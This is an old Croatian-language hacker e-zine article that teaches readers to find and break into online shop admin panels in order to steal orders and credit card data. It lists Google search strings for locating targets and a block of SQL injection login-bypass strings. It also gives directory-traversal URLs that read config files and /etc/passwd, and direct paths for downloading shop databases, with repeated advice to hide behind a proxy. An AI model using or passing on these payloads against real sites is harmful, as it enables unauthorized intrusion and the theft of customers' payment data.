Copy Link
Add to Bookmark
Report
1x09 Exploiting ShopAdmin
...................
...::: phearless zine #1 :::...
.....................>---[ Exploiting ShopAdmin ]---<.......................
...........................>---[ by Re00t ]---<.............................
Re00t[at]ii-labs[dot]org
SADRZAJ:
[0] Uvod
[1] ASP ShopAdmini
[2] Alabanza AlaCar
[3] CommerceSQL
[4] Meta Cart
[5] shop.pl
[6] Windows ShopAdmini
[7] The End
////////////////////////////////////////////////////////////////////////////
--==<[ 0. Uvod
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Evo ja sam takodjer odlucio napisat neki tekst za eZine... odlucio sam
pisati o ranjivostima raznih shopova, prikupljanju cc-a i sve sto se tice
shopadmina, posto nisam vidio niti jedan domaci tekst o tome ! Ako trebate
bilo kakvu pomoc mozete me kontaktirati na moj e-mail ( Re00t@ii-labs.org )
ili irc.krstarica.org #HackGen !!!
////////////////////////////////////////////////////////////////////////////
--==<[ 1. ASP ShopAdmini
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Znaci morate traziti u google-u shop.asp -> To je najcesci ali takodjer
mozete traziti i ove:
shopadmin1.asp
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
Kada nadjete shopadmin, naravno morate prvo naci one ranjive... onda
koristite sljedece kodove za upadanje u njih:
'or'1
'or''='
'='
Admin
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Te kodove kopirajte i staviti isti kod u username i password... ako je shop
ranjiv, trebali bi dobiti pristup narudzbama, logovima i ostalom...
*** KORISTITE PROXY ***
////////////////////////////////////////////////////////////////////////////
--==<[ 2. Alabanza AlaCar
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Ok ovo je lagano exploitati, trazite u google:
s-cart/admin
Kada ga nadjete, ulogirajte se sa:
Username: =
Password: =
*** KORISTITE PROXY ***
////////////////////////////////////////////////////////////////////////////
--==<[ 3. CommerceSQL
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
CommerceSQL explotajte na sljedeci nacin kada nadjete CommerceSQL SHOP !
Kucajte ove urlove:
Primjer:
http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
Ili ako hocete preko google-a
admin/files/order.log
*** KORISTITE PROXY ***
////////////////////////////////////////////////////////////////////////////
--==<[ 4. Meta Cart
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Meta Cart je free shop znaci ne naplacuje se a kako ga exploitati ... :)
Jednostavno...
http://www.domena.com/database/metacart.mdb
http://www.domena.com/metacart/database/metacart.mdb
*** KORISTITE PROXY ***
////////////////////////////////////////////////////////////////////////////
--==<[ 5. shop.pl
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Nije bas jako popularan ali naci cete ga preko google-a. Znaci otkucajte
shop.pl u google-u.
A exploitati ga ovako...
http://www.domena.com/cgi-local/shop.pl/page=shop.cfg is where the config file
is located.
http://www.domena.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd
http://www.domena.com/cgi-local/shop.pl/page=./product_list
*** KORISTITE PROXY ***
////////////////////////////////////////////////////////////////////////////
--==<[ 6. Windows shopadmini
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Ovi su totalno lame... sve ide preko testa baze :) Trazite preko googla
linkove koji se zavrsavaju sa:
shopdisplaycategories.asp
Kada ga nadjete, umjesto shopdisplaycategories.asp stavite ovo:
shopdbtest.asp
I onda pogledajte sto pise pod xDatabase: shopping and xDblocation:\shop_db
i sada dodajte na Domenu:
/shop_db/shopping.mdb
ili gdje se nalazi shop i skinete bazu s CCima i narudzbama :-) !!!
*** KORISTITE PROXY ***
////////////////////////////////////////////////////////////////////////////
--==<[ 7. The End
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Evo pozdravljam sve sa #ugs, #hackgen, #secure, #office na irc.krstarica.org
Sve s HackGen-a, II-labs-a ...
